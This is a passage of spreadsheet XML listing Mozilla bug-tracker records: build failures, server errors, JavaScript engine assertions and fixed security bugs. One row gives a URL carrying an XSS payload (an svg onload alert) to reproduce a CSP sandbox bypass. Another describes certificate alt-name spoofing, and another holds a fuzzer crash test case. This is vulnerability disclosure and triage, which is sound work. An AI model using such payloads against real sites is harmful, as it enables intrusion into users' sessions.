      <c r="D3979" t="inlineStr">
        <is>
          <t>2019-03-06 09:54:02 -0800</t>
        </is>
      </c>
      <c r="E3979" t="n">
        <v>1</v>
      </c>
      <c r="F3979" t="n">
        <v>1</v>
      </c>
      <c r="G3979" t="n">
        <v>6</v>
      </c>
      <c r="H3979" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3979" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J3979" t="inlineStr">
        <is>
          <t>WebOps: Other</t>
        </is>
      </c>
      <c r="K3979" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3979" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3979" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3979" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3979" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3979" t="inlineStr"/>
      <c r="Q3979" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3979" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3979" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3979" t="n">
        <v>1</v>
      </c>
      <c r="U3979" t="n">
        <v>0</v>
      </c>
      <c r="V3979" t="n">
        <v>4</v>
      </c>
      <c r="W3979" t="inlineStr">
        <is>
          <t>There is a serious regression in Socorro 26. We need to push 25 back into production while we figure out what to do about 26.
Build: https://ci.mozilla.org/job/socorro-release/256/artifact/socorro.tar.gz</t>
        </is>
      </c>
      <c r="X3979" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3980">
      <c r="A3980" t="n">
        <v>1426566</v>
      </c>
      <c r="B3980" t="inlineStr">
        <is>
          <t>2017-12-20 18:36:50 -0800</t>
        </is>
      </c>
      <c r="C3980" t="inlineStr">
        <is>
          <t>Debug and DevEdition builds are going to permafail when Gecko 59 merges to Beta on 2018-01-11 due to test_compare_mozconfigs faliures</t>
        </is>
      </c>
      <c r="D3980" t="inlineStr">
        <is>
          <t>2018-03-02 12:12:20 -0800</t>
        </is>
      </c>
      <c r="E3980" t="n">
        <v>1</v>
      </c>
      <c r="F3980" t="n">
        <v>1</v>
      </c>
      <c r="G3980" t="n">
        <v>7</v>
      </c>
      <c r="H3980" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3980" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J3980" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3980" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3980" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3980" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3980" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3980" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3980" t="inlineStr"/>
      <c r="Q3980" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3980" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3980" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T3980" t="n">
        <v>1</v>
      </c>
      <c r="U3980" t="n">
        <v>0</v>
      </c>
      <c r="V3980" t="n">
        <v>30</v>
      </c>
      <c r="W3980" t="inlineStr">
        <is>
          <t>[Tracking Requested - why for this release]: Permafailing builds on the next merge day
Looks like it doesn't like the removal of the --enable-profiling line from the nightly mozconfigs which is done by our merge day automation.
https://treeherder.mozilla.org/logviewer.html#?job_id=152738647&amp;repo=try
ERROR:__main__:extra line in nightly whitelist: ac_add_options --enable-profiling
Patch to reproduce with:
https://hg.mozilla.org/try/rev/d69a5517d881095f95b5599cc40342d57be49792
Tom Prince reminds me that I can just remove that entry from the whitelist as a workaround for my Try pushes, but I'm not sure what we want to do for a longer-term fix.</t>
        </is>
      </c>
      <c r="X3980" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3981">
      <c r="A3981" t="n">
        <v>911326</v>
      </c>
      <c r="B3981" t="inlineStr">
        <is>
          <t>2013-08-30 13:13:20 -0700</t>
        </is>
      </c>
      <c r="C3981" t="inlineStr">
        <is>
          <t>Tried to move docs/en-US/SpiderMonkey to docs/en-US/Mozilla/Projects/SpiderMonkey, got ISE</t>
        </is>
      </c>
      <c r="D3981" t="inlineStr">
        <is>
          <t>2020-05-15 11:43:12 -0700</t>
        </is>
      </c>
      <c r="E3981" t="n">
        <v>1</v>
      </c>
      <c r="F3981" t="n">
        <v>1</v>
      </c>
      <c r="G3981" t="n">
        <v>6</v>
      </c>
      <c r="H3981" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3981" t="inlineStr">
        <is>
          <t>developer.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J3981" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3981" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3981" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3981" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3981" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3981" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3981" t="inlineStr"/>
      <c r="Q3981" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3981" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3981" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3981" t="n">
        <v>1</v>
      </c>
      <c r="U3981" t="n">
        <v>0</v>
      </c>
      <c r="V3981" t="n">
        <v>10</v>
      </c>
      <c r="W3981" t="inlineStr">
        <is>
          <t>I tried to move the SpiderMonkey docs to its new home and almost immediately got an internal server error. Then I tried to move just a subsection of it, to try to fix things, and got another one. After that, I decided it's time to let the experts take a look.
At this point, part of the SpiderMonkey docs are in one place, and part of them are in another. I have no idea if there are parts that are no longer connected properly in the database, etc. Can an expert please try to figure out what's wrong and fix it so we can finish moving this content to where it belongs? Thanks!</t>
        </is>
      </c>
      <c r="X3981" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3982">
      <c r="A3982" t="n">
        <v>896126</v>
      </c>
      <c r="B3982" t="inlineStr">
        <is>
          <t>2013-07-19 17:27:07 -0700</t>
        </is>
      </c>
      <c r="C3982" t="inlineStr">
        <is>
          <t>Assertion failure: parent, at jswrapper.cpp</t>
        </is>
      </c>
      <c r="D3982" t="inlineStr">
        <is>
          <t>2014-11-19 20:11:55 -0800</t>
        </is>
      </c>
      <c r="E3982" t="n">
        <v>1</v>
      </c>
      <c r="F3982" t="n">
        <v>1</v>
      </c>
      <c r="G3982" t="n">
        <v>3</v>
      </c>
      <c r="H3982" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3982" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3982" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3982" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3982" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3982" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3982" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3982" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3982" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main24+]</t>
        </is>
      </c>
      <c r="Q3982" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3982" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3982" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T3982" t="n">
        <v>1</v>
      </c>
      <c r="U3982" t="n">
        <v>0</v>
      </c>
      <c r="V3982" t="n">
        <v>21</v>
      </c>
      <c r="W3982" t="inlineStr">
        <is>
          <t>Created attachment 778746
stack
({
    r: function() {
        function f() {
            w[0xe56241c6 &gt;&gt; 3]
        }
    },
    s: function() {
        "use asm"
        return (1 for
asserts js debug shell on m-c changeset 0d0263a58f06 without any CLI arguments at Assertion failure: parent, at jswrapper.cpp</t>
        </is>
      </c>
      <c r="X3982" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3983">
      <c r="A3983" t="n">
        <v>240261</v>
      </c>
      <c r="B3983" t="inlineStr">
        <is>
          <t>2004-04-11 14:35:43 -0700</t>
        </is>
      </c>
      <c r="C3983" t="inlineStr">
        <is>
          <t>[1.8 branch] peer-trusted certs can use alt names to spoof</t>
        </is>
      </c>
      <c r="D3983" t="inlineStr">
        <is>
          <t>2008-07-04 18:16:22 -0700</t>
        </is>
      </c>
      <c r="E3983" t="n">
        <v>1</v>
      </c>
      <c r="F3983" t="n">
        <v>1</v>
      </c>
      <c r="G3983" t="n">
        <v>3</v>
      </c>
      <c r="H3983" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3983" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3983" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K3983" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L3983" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3983" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3983" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3983" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3983" t="inlineStr">
        <is>
          <t>[sg:moderate][kerh-coa]</t>
        </is>
      </c>
      <c r="Q3983" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3983" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3983" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3983" t="n">
        <v>1</v>
      </c>
      <c r="U3983" t="n">
        <v>0</v>
      </c>
      <c r="V3983" t="n">
        <v>38</v>
      </c>
      <c r="W3983" t="inlineStr">
        <is>
          <t>There appears to be a vulnerability in the way that the peer trust model
interacts with alternative subject names.  The issue is that NSS only has a
single bit which trusts a cert for all of its subject names, not just the name
the user intended to trust the cert for.
An example would come from an https site with a malicious self-signed cert. 
despot.mozilla.org would be a good example of a good launch site--someplace
where users would not find a self-signed cert to be unusual.  The cert would not
only contain its own, legitimate, domain, but would include an alternate name of
a site the attacker wishes to spoof.  The user accepts the cert for purposes of
authenticating the legitimate domain, but PSM has NSS mark the cert as trusted
for domains that were never mentioned to the user.
This affects all peer-trust areas, SSL, S/MIME, and code signing.
Bug 230655 at least gives the user an way to see what the domains are, without
having to decode ASN.1 in their head.  At a minimum, PSM would need to list all
of the alternative names before giving the user the opportunity to mark the cert
as peer-trusted--this is related to bug 238142.
Better would be to have, instead of a peer-trust bit on the cert, a list of
names for which the cert is peer-trusted.  This would require either an
extensive change to NSS or for slightly more extensive changes to PSM to take
over the peer-trust-database functions of NSS.</t>
        </is>
      </c>
      <c r="X3983" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3984">
      <c r="A3984" t="n">
        <v>398625</v>
      </c>
      <c r="B3984" t="inlineStr">
        <is>
          <t>2007-10-04 15:48:48 -0700</t>
        </is>
      </c>
      <c r="C3984" t="inlineStr">
        <is>
          <t>l10n URL support</t>
        </is>
      </c>
      <c r="D3984" t="inlineStr">
        <is>
          <t>2010-01-11 23:44:31 -0800</t>
        </is>
      </c>
      <c r="E3984" t="n">
        <v>1</v>
      </c>
      <c r="F3984" t="n">
        <v>1</v>
      </c>
      <c r="G3984" t="n">
        <v>5</v>
      </c>
      <c r="H3984" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3984" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3984" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3984" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3984" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3984" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3984" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3984" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3984" t="inlineStr">
        <is>
          <t>tiki_triage</t>
        </is>
      </c>
      <c r="Q3984" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3984" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3984" t="inlineStr">
        <is>
          <t>0.5</t>
        </is>
      </c>
      <c r="T3984" t="n">
        <v>1</v>
      </c>
      <c r="U3984" t="n">
        <v>0</v>
      </c>
      <c r="V3984" t="n">
        <v>13</v>
      </c>
      <c r="W3984" t="inlineStr">
        <is>
          <t>We need support for the locale string in the URL:
* support.mozilla.com/en-US/kb/Article+Name
* support.mozilla.com/sv/kb/Article+Name
* support.mozilla.com/en-US/chat/
* support.mozilla.com/en-US/forum/ 
When accessing a locale that doesn't include a requested kb page, it should fall back according to the http accept-language header (or the fallback language a logged in user has specified). However, the URL should remain unchanged.</t>
        </is>
      </c>
      <c r="X3984" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3985">
      <c r="A3985" t="n">
        <v>163746</v>
      </c>
      <c r="B3985" t="inlineStr">
        <is>
          <t>2002-08-20 16:05:59 -0700</t>
        </is>
      </c>
      <c r="C3985" t="inlineStr">
        <is>
          <t>cache block file patch horked support for partial cache entries [large image requests never load once interrupted]</t>
        </is>
      </c>
      <c r="D3985" t="inlineStr">
        <is>
          <t>2002-09-26 18:55:53 -0700</t>
        </is>
      </c>
      <c r="E3985" t="n">
        <v>1</v>
      </c>
      <c r="F3985" t="n">
        <v>1</v>
      </c>
      <c r="G3985" t="n">
        <v>3</v>
      </c>
      <c r="H3985" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3985" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3985" t="inlineStr">
        <is>
          <t>Networking: Cache</t>
        </is>
      </c>
      <c r="K3985" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3985" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3985" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3985" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3985" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3985" t="inlineStr"/>
      <c r="Q3985" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3985" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3985" t="inlineStr">
        <is>
          <t>mozilla1.2alpha</t>
        </is>
      </c>
      <c r="T3985" t="n">
        <v>1</v>
      </c>
      <c r="U3985" t="n">
        <v>0</v>
      </c>
      <c r="V3985" t="n">
        <v>12</v>
      </c>
      <c r="W3985" t="inlineStr">
        <is>
          <t>cache block file patch horked support for partial cache entries [large image
requests never load once interrupted].
see:
http://unagi.mcom.com/~darinf/test2.html
stop the page load before the images load, and then press enter in the URL bar
after some of the images have started loading.  notice that the images that had
previously started loading will never load.
there's an assertion in the nsDiskCacheStreams.cpp when trying to issue a byte
range request to complete the partial cache entry.
WARNING: data too large for buffer, file
/builds/trunk/mozilla/netwerk/cache/src/nsDiskCacheStreams.cpp, line 648
this error is not propogated correctly in the http code and we just end up never
being able to load the image.</t>
        </is>
      </c>
      <c r="X3985" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3986">
      <c r="A3986" t="n">
        <v>465262</v>
      </c>
      <c r="B3986" t="inlineStr">
        <is>
          <t>2008-11-16 21:33:28 -0800</t>
        </is>
      </c>
      <c r="C3986" t="inlineStr">
        <is>
          <t>TM: JIT affects truthiness of (3 &gt; null)</t>
        </is>
      </c>
      <c r="D3986" t="inlineStr">
        <is>
          <t>2009-01-16 00:00:57 -0800</t>
        </is>
      </c>
      <c r="E3986" t="n">
        <v>1</v>
      </c>
      <c r="F3986" t="n">
        <v>1</v>
      </c>
      <c r="G3986" t="n">
        <v>3</v>
      </c>
      <c r="H3986" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3986" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3986" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3986" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3986" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3986" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3986" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3986" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3986" t="inlineStr"/>
      <c r="Q3986" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3986" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3986" t="inlineStr">
        <is>
          <t>mozilla1.9.1b2</t>
        </is>
      </c>
      <c r="T3986" t="n">
        <v>1</v>
      </c>
      <c r="U3986" t="n">
        <v>0</v>
      </c>
      <c r="V3986" t="n">
        <v>8</v>
      </c>
      <c r="W3986" t="inlineStr">
        <is>
          <t>js&gt; for(j=0;j&lt;5;++j) print("" + (3 &gt; null))
true
true
false
false
false</t>
        </is>
      </c>
      <c r="X3986" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3987">
      <c r="A3987" t="n">
        <v>151940</v>
      </c>
      <c r="B3987" t="inlineStr">
        <is>
          <t>2002-06-14 17:06:25 -0700</t>
        </is>
      </c>
      <c r="C3987" t="inlineStr">
        <is>
          <t>Mozilla 1.0 crashes when importing a certificate from an empty file</t>
        </is>
      </c>
      <c r="D3987" t="inlineStr">
        <is>
          <t>2002-06-26 10:09:16 -0700</t>
        </is>
      </c>
      <c r="E3987" t="n">
        <v>1</v>
      </c>
      <c r="F3987" t="n">
        <v>1</v>
      </c>
      <c r="G3987" t="n">
        <v>3</v>
      </c>
      <c r="H3987" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3987" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3987" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3987" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3987" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3987" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3987" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3987" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3987" t="inlineStr">
        <is>
          <t>[adt2 rtm] [eta 06/21]</t>
        </is>
      </c>
      <c r="Q3987" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3987" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3987" t="inlineStr">
        <is>
          <t>3.5</t>
        </is>
      </c>
      <c r="T3987" t="n">
        <v>1</v>
      </c>
      <c r="U3987" t="n">
        <v>0</v>
      </c>
      <c r="V3987" t="n">
        <v>19</v>
      </c>
      <c r="W3987" t="inlineStr">
        <is>
          <t>If you try to import a certificate from a file that is empty, mozilla crashes
with an access violation</t>
        </is>
      </c>
      <c r="X3987" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3988">
      <c r="A3988" t="n">
        <v>1396320</v>
      </c>
      <c r="B3988" t="inlineStr">
        <is>
          <t>2017-09-02 15:37:27 -0700</t>
        </is>
      </c>
      <c r="C3988" t="inlineStr">
        <is>
          <t>allow-same-origin capability always granted in CSP sandbox directive</t>
        </is>
      </c>
      <c r="D3988" t="inlineStr">
        <is>
          <t>2024-05-30 09:36:28 -0700</t>
        </is>
      </c>
      <c r="E3988" t="n">
        <v>1</v>
      </c>
      <c r="F3988" t="n">
        <v>1</v>
      </c>
      <c r="G3988" t="n">
        <v>3</v>
      </c>
      <c r="H3988" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3988" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3988" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K3988" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L3988" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3988" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3988" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3988" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3988" t="inlineStr">
        <is>
          <t>[domsecurity-active][adv-main56+][adv-esr52.4+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3988" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3988" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3988" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T3988" t="n">
        <v>1</v>
      </c>
      <c r="U3988" t="n">
        <v>0</v>
      </c>
      <c r="V3988" t="n">
        <v>12</v>
      </c>
      <c r="W3988" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Steps to reproduce:
1. Go to https://test.shhnjk.com/allow-scripts.php?xss=%3Csvg%20onload=alert(document.domain)%3E
2. You will see alert with document.domain
Actual results:
alert with document.domain
Expected results:
Firefox should grant opaque origin to document when CSP sandbox doesn't have allow-same-origin flag. Currently, "Content-Security-Policy: sandbox allow-scripts" is enough to execute script with origin.
https://www.w3.org/TR/CSP2/#directive-sandbox
"The sandbox directive allows any resource, framed or not, to ask for the same sorts of restrictions to be applied to itself."</t>
        </is>
      </c>
      <c r="X3988" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3989">
      <c r="A3989" t="n">
        <v>1565399</v>
      </c>
      <c r="B3989" t="inlineStr">
        <is>
          <t>2019-07-11 16:05:36 -0700</t>
        </is>
      </c>
      <c r="C3989" t="inlineStr">
        <is>
          <t>update browsertime snapshot  to address lodash vulnerability</t>
        </is>
      </c>
      <c r="D3989" t="inlineStr">
        <is>
          <t>2020-06-05 00:25:34 -0700</t>
        </is>
      </c>
      <c r="E3989" t="n">
        <v>1</v>
      </c>
      <c r="F3989" t="n">
        <v>1</v>
      </c>
      <c r="G3989" t="n">
        <v>7</v>
      </c>
      <c r="H3989" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3989" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J3989" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3989" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3989" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3989" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3989" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3989" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3989" t="inlineStr">
        <is>
          <t>[post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3989" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3989" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3989" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T3989" t="n">
        <v>1</v>
      </c>
      <c r="U3989" t="n">
        <v>0</v>
      </c>
      <c r="V3989" t="n">
        <v>4</v>
      </c>
      <c r="W3989" t="inlineStr">
        <is>
          <t>The current browsertime snapshot depends on lodash 4.6.1 and lodash 4.7.11 which have security vulnerabilities.  Update the snapshot to 4989d0c22bba3a165078b8d784e8d303a727a119 which will use 4.6.2 and 4.7.14 which has the problems addressed.</t>
        </is>
      </c>
      <c r="X3989" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3990">
      <c r="A3990" t="n">
        <v>479288</v>
      </c>
      <c r="B3990" t="inlineStr">
        <is>
          <t>2009-02-19 12:09:55 -0800</t>
        </is>
      </c>
      <c r="C3990" t="inlineStr">
        <is>
          <t>Lack of XOW</t>
        </is>
      </c>
      <c r="D3990" t="inlineStr">
        <is>
          <t>2009-07-21 17:26:50 -0700</t>
        </is>
      </c>
      <c r="E3990" t="n">
        <v>1</v>
      </c>
      <c r="F3990" t="n">
        <v>1</v>
      </c>
      <c r="G3990" t="n">
        <v>3</v>
      </c>
      <c r="H3990" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3990" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3990" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K3990" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3990" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3990" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3990" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3990" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3990" t="inlineStr">
        <is>
          <t>[sg:high] regression from security fix 460882</t>
        </is>
      </c>
      <c r="Q3990" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3990" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3990" t="inlineStr">
        <is>
          <t>mozilla1.9.1</t>
        </is>
      </c>
      <c r="T3990" t="n">
        <v>1</v>
      </c>
      <c r="U3990" t="n">
        <v>0</v>
      </c>
      <c r="V3990" t="n">
        <v>12</v>
      </c>
      <c r="W3990" t="inlineStr">
        <is>
          <t>This seems to be a regression from bug 460882.
When accessing a window by using __parent__ property or valueOf.call(), the
window is not wrapped in XOW.
Sorry if this is a duplicate of bug 478910 or bug 479211.</t>
        </is>
      </c>
      <c r="X3990" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3991">
      <c r="A3991" t="n">
        <v>1187420</v>
      </c>
      <c r="B3991" t="inlineStr">
        <is>
          <t>2015-07-24 11:40:41 -0700</t>
        </is>
      </c>
      <c r="C3991" t="inlineStr">
        <is>
          <t>MSan use-of-uninitialized-value jdhuff.c:668 in decode_mcu_fast</t>
        </is>
      </c>
      <c r="D3991" t="inlineStr">
        <is>
          <t>2016-09-22 17:19:09 -0700</t>
        </is>
      </c>
      <c r="E3991" t="n">
        <v>1</v>
      </c>
      <c r="F3991" t="n">
        <v>1</v>
      </c>
      <c r="G3991" t="n">
        <v>3</v>
      </c>
      <c r="H3991" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3991" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3991" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K3991" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3991" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3991" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3991" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3991" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3991" t="inlineStr">
        <is>
          <t>[adv-main46+][adv-esr38.8+][adv-esr45.1+]</t>
        </is>
      </c>
      <c r="Q3991" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3991" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3991" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T3991" t="n">
        <v>1</v>
      </c>
      <c r="U3991" t="n">
        <v>0</v>
      </c>
      <c r="V3991" t="n">
        <v>38</v>
      </c>
      <c r="W3991" t="inlineStr">
        <is>
          <t>Created attachment 8638678
call_stack.txt
Found while using djpeg as a fuzzing target with afl.</t>
        </is>
      </c>
      <c r="X3991" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3992">
      <c r="A3992" t="n">
        <v>845983</v>
      </c>
